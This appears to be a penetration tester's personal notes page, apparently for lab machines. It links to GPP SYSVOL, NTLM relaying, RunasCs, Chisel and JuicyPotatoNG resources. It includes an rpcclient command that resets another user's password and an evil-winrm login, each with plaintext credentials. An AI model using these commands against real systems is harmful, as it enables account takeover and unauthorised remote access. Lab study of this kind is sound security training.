Temp - Notes

Exploiting GPP SYSVOL - cname password / Groups.xml

LogoExploiting GPP SYSVOL (Groups.xml) | VK9 SecurityVK9 Security
LogoPractical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py

Setting up network between Vbox and VMware

LogoHow to Set up Network Between VirtualBox and VMware Virtual MachinesSysprobs

Check Recycle bin

you need the SID for the user that you want to check the recycle bin for.

cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001'

Change password for user over rcpclient

Output should be nothing.
rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "alien##123"'

EVIL-WINRM for ATHNEA

👾]/home/ali3nw3rx $ sudo docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'

runAS

LogoGitHub - antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exeGitHub
LogoWindows Privilege Escalation - Runas (Stored Credentials) - StefLan's Security BlogStefLan's Security Blog

Chisel

LogoRelease v1.7.7 · jpillora/chiselGitHub

Juicy PotatoNG

LogoRelease JuicyPotatoNG v1.1 · antonioCoco/JuicyPotatoNGGitHub

Windows path traversal cheet sheat

PreviousNIM

Last updated